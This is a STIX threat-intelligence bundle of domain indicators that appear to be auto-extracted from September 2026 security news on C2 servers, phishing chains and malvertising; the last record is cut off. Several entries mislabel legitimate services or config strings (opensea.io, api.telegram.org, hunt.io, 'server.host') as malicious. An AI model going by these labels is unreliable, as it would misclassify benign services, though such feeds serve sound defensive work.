{"type":"bundle","id":"bundle--82db15a6-ec30-4f5e-8e3e-c44ab79a1d41","objects":[{"type":"identity","spec_version":"2.1","id":"identity--17e66e4e-0547-4b63-b732-0da774375549","created":"2026-09-15T22:16:24.403Z","modified":"2026-09-15T22:16:24.403Z","name":"ZeroHour","identity_class":"system","description":"Indicators auto-extracted from public security reporting. Verify before use."},{"type":"indicator","spec_version":"2.1","id":"indicator--a87ac691-f034-4b7f-a566-a64f469a88aa","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: vip311.cc","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: e. Screenshots of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc ass","pattern":"[domain-name:value = 'vip311.cc']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7080a34c-664f-4e07-83b1-1f2af196a939","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: zenplay77-x.space","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: o sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with PeckBirdy. The problem i","pattern":"[domain-name:value = 'zenplay77-x.space']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--23e07800-d6d4-4aa3-8088-01763b987bd9","created":"2026-09-15T19:38:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: zzyud.com","description":"Seen in \"Low-quality casino sites conceal highly dangerous threat actors\" (The Register · Security). Context: s of three casino sites identified by Infoblox—vip311[.]cc, zzyud[.]com and zenplay77-x[.]space—with vip311[.]cc associated with","pattern":"[domain-name:value = 'zzyud.com']","pattern_type":"stix","valid_from":"2026-09-15T19:38:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/15/low-quality-casino-sites-conceal-highly-dangerous-threat-actors/5296652"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--55867882-c5c1-45ed-9f47-3ea7f731e582","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: luizestrelhashapr.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: filtrating browser data for each profile to its C2 server (\"luizestrelhashapr[.]online:443\") but not before requesting extensive access to brows","pattern":"[domain-name:value = 'luizestrelhashapr.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c5871f20-9c52-4f19-ac90-2d028fff0a76","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: volmira.site","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: to the same Ethereum smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain th","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--097c26c6-d3a8-4fb3-9431-3d395a790d56","created":"2026-09-15T18:54:14.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: zaviro.online","description":"Seen in \"KREMLIN Banking Malware Hijacks Chrome and Edge to Steal Credentials and Session Tokens\" (The Hacker News). Context: um smart contract to fetch two domains – volmira[.]site and zaviro[.]online – and queries the former to obtain the browser extension","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-15T18:54:14.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/kremlin-banking-malware-hijacks-chrome.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5f0690bc-b8a1-4198-a668-e225100d1691","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: c2iznja.com","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: on the machine and exfiltrate them to the C2 server (\"api80.c2iznja[.]com\"). \"The domains used Cloudflare as a proxy for their infr","pattern":"[domain-name:value = 'c2iznja.com']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--26ee4ed3-736b-4a9c-aaad-4195393183ed","created":"2026-09-15T15:23:19.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: chat5188.tk","description":"Seen in \"BambooToken Malware Uses MQTT to Control Windows and Linux Systems\" (The Hacker News). Context: gather system details and transmit them to the C2 server (\"chat5188[.]tk\"). In response, the server issues commands to load a plug","pattern":"[domain-name:value = 'chat5188.tk']","pattern_type":"stix","valid_from":"2026-09-15T15:23:19.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bambootoken-malware-uses-mqtt-to.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3452ac61-6615-4e5a-b712-b07511d86868","created":"2026-09-15T13:33:58.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hunt.io","description":"Seen in \"Thai Broadband Provider Hacked via Fortinet Vulnerability\" (SecurityWeek). Context: mand-and-control (C&C) platform for remote administration,” Hunt.io says. Next, the attackers used various scripts for host dis","pattern":"[domain-name:value = 'hunt.io']","pattern_type":"stix","valid_from":"2026-09-15T13:33:58.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/thai-broadband-provider-hacked-via-fortinet-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--47114ff6-9dd4-4513-92fe-a7ce5f8b00d5","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: gets through redirect and tracking infrastructure including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . Th","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3bcd66a7-ece4-4332-8282-a9b73c3bd10b","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: eightindigostove.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: 75-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was assessed as fake renewal scarew","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0536436e-0e99-4133-a24f-55f5a694089c","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: loadswage.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ture including 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net , loadswage[.]com , and eightindigostove[.]com . The final operation was as","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35c6e23a-d2de-4302-96b3-06e91ae20f9a","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: moolaah.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: d through Amazon Simple Email Service from the DKIM-aligned moolaah[.]com domain and urged recipients to open a supposed Mahnschrei","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0f6aeb50-eaf5-4da8-a6f7-2bb716fc30f0","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: opensea.io","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: itting a concealed POST request and eventually resolving to opensea[.]io during live analysis. Virus Bulletin’s Q3 2026 VBSpam tes","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--54b7e923-f800-41b7-95a0-f8b270f32c30","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: s IPv4 address 103[.]193[.]179[.]223 and redirected through web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ before ultimately reaching Google during verificati","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c5f9ae5-df07-421d-a3e3-e806477fe146","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: ent reminder. No file was attached. Its embedded URL led to website-2df62808[.]mvplineup[.]com/audacity/underside , a first-stage page containing deco","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--23159010-9124-4cee-9926-1f95f9de3c0c","created":"2026-09-15T13:04:34.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xmasbrick.com","description":"Seen in \"Phishing Attacks Abuse Trusted Email Infrastructure and URL Cloaking to Evade Security Filters\" (GBHackers). Context: : Virus Bulletin). Sent from the DKIM-aligned but unrelated xmasbrick[.]com domain, the message embedded an IPv6-mapped address: hxxp","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T13:04:34.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/trusted-email-abuse/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4f9aa2ba-6116-490a-a11d-4e7f4277d5e2","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: 31-59-175-195.syd.nbn.aussiebb.net","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: of compromise (IoCs):- Type Indicator Description Hostname 31-59-175-195[.]syd[.]nbn[.]aussiebb[.]net Redirect infrastructure used in the antivirus renew","pattern":"[domain-name:value = '31-59-175-195.syd.nbn.aussiebb.net']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bf7a4238-1dfb-4b46-82f3-6ffb108ff75a","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: eightindigostove.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ssociated with the antivirus renewal phishing sample Domain eightindigostove[.]com Domain hosting the unsubscribe path in the antivirus rene","pattern":"[domain-name:value = 'eightindigostove.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b760bb1e-3ab9-4893-b3f1-0207bfa2c6b2","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: loadswage.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: sed in the antivirus renewal scareware phishing flow Domain loadswage[.]com Redirect infrastructure associated with the antivirus ren","pattern":"[domain-name:value = 'loadswage.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--12347183-5fb3-4337-8ce4-e36fded8b0b3","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: moolaah.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: path in the antivirus renewal phishing sample Sender domain moolaah[.]com DKIM-aligned sender domain used for the cloaked overdue-p","pattern":"[domain-name:value = 'moolaah.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2cb5f4a1-2b4b-4088-b9d3-73c24926ade1","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: opensea.io","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: ing page used in the invoice phishing redirect chain Domain opensea[.]io Final destination reached after the cloaking and browser-","pattern":"[domain-name:value = 'opensea.io']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f8bc00e8-b4e4-4247-a67f-4efdf5bbfa4e","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: web5-4s4c-online-garantibbva.vibtee.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: Pv4 address represented by the IPv6-mapped URL notation URL web5-4s4c-online-garantibbva[.]vibtee[.]com/ro/ Redirect destination in the Romanian PSD2 banking p","pattern":"[domain-name:value = 'web5-4s4c-online-garantibbva.vibtee.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cf68c303-e8a0-48b5-8404-5891a274df6a","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: website-2df62808.mvplineup.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: omain used for the cloaked overdue-payment invoice lure URL website-2df62808[.]mvplineup[.]com/audacity/underside First-stage cloaking page used in th","pattern":"[domain-name:value = 'website-2df62808.mvplineup.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--efe8713c-decf-4a70-b1d9-8b3754668dd6","created":"2026-09-15T12:02:50.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: xmasbrick.com","description":"Seen in \"New Phishing Attacks Use Trusted Email Infrastructure and URL Cloaking to Bypass Security Tools\" (Cyber Security News). Context: the cloaking and browser-fingerprinting stage Sender domain xmasbrick[.]com DKIM-aligned but unrelated sender domain used in the Roma","pattern":"[domain-name:value = 'xmasbrick.com']","pattern_type":"stix","valid_from":"2026-09-15T12:02:50.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/new-phishing-attacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6358adec-95c3-46cd-a77e-0b94094410e4","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: api.telegram.org","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ing in logging unexpectedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io ip","pattern":"[domain-name:value = 'api.telegram.org']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--791bb98f-5646-470f-99de-543b7968ca0a","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: backblazeb2.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: ctedly should be investigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightnin","pattern":"[domain-name:value = 'backblazeb2.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4174741c-e8dd-4327-8067-e89d27d48bb7","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: iproyal.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: [.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is fo","pattern":"[domain-name:value = 'iproyal.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--afcbb640-6347-4922-872a-0e3832c7c6cb","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: lightningproxies.net","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: zeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best defence is for the user/victim to be","pattern":"[domain-name:value = 'lightningproxies.net']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1881b13c-9e46-499f-ab61-1fe895fe3c10","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: storjshare.io","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: : api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Mitigations The best","pattern":"[domain-name:value = 'storjshare.io']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3c06232a-5b3b-4cc5-8a70-e1768f7fb2ac","created":"2026-09-15T12:00:00.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: vultrobjects.com","description":"Seen in \"Iranian cyber targeting of dissidents, activists and journalists\" (NCSC UK). Context: nvestigated further: api[.]telegram[.]org backblazeb2[.]com vultrobjects[.]com storjshare[.]io iproyal[.]com lightningproxies[.]net Miti","pattern":"[domain-name:value = 'vultrobjects.com']","pattern_type":"stix","valid_from":"2026-09-15T12:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"NCSC UK","url":"https://www.ncsc.gov.uk/news/iranian-cyber-targeting-of-dissidents-activists-and-journalists"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6658ff01-8156-4c0b-bdb1-ef1a519ac998","created":"2026-09-15T11:51:03.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: ember-bridge.com","description":"Seen in \"HBO Max’s verified Reddit account hijacked to spread malware\" (Malwarebytes Labs). Context: lution with a web protection component. Malwarebytes blocks ember-bridge.com, which is part of the PasteSwitch infrastructure. Educate y","pattern":"[domain-name:value = 'ember-bridge.com']","pattern_type":"stix","valid_from":"2026-09-15T11:51:03.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Malwarebytes Labs","url":"https://www.malwarebytes.com/blog/news/2026/09/hbo-maxs-verified-reddit-account-hijacked-to-spread-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--79cede9c-1555-4866-992c-3785198762a1","created":"2026-09-15T11:12:32.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: server.host","description":"Seen in \"Mass-Scanning Campaign Exploits Vite Flaw to Extract Cloud Credentials From Exposed Dev Servers\" (The Hacker News). Context: exposes the Vite dev server to the network using --host or server.host config option The sensitive file exists in the allowed dire","pattern":"[domain-name:value = 'server.host']","pattern_type":"stix","valid_from":"2026-09-15T11:12:32.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/mass-scanning-campaign-exploits-vite.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--09fc8858-a995-4627-9147-3a2d0180082a","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: clean-disk-guide.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: oke down into 15 ads for a fake macOS disk utility at apple.clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. O","pattern":"[domain-name:value = 'clean-disk-guide.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be25d082-a6e9-48c6-aca0-7c841bbb9ed4","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: code-desktop.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: .clean-disk-guide[.]com and 11 for other developer tools at code-desktop[.]com. One entry point into a larger system The HBO Max ads wer","pattern":"[domain-name:value = 'code-desktop.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e174274-e412-4d1b-8e5c-16ae016cdd7b","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: codex-craft.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: -macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craft[.]com. The rest broke down into 15 ads for a fake macOS disk ut","pattern":"[domain-name:value = 'codex-craft.com']","pattern_type":"stix","valid_from":"2026-09-15T10:10:15.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/15/hbo-max-reddit-account-clickfix-infostealer-malware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--143793a2-9614-47c0-9b6f-49eff6857092","created":"2026-09-15T10:10:15.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: hbomax-macos.com","description":"Seen in \"Attackers hijack HBO Max’s Reddit account for 48-hour malvertising blitz\" (Help Net Security). Context: s, 46 used an HBO Max lure, split between hbomaxx[.]app and hbomax-macos[.]com. Another 36 posed as OpenAI Codex, pointing to codex-craf","pattern":"[domain-name:value = 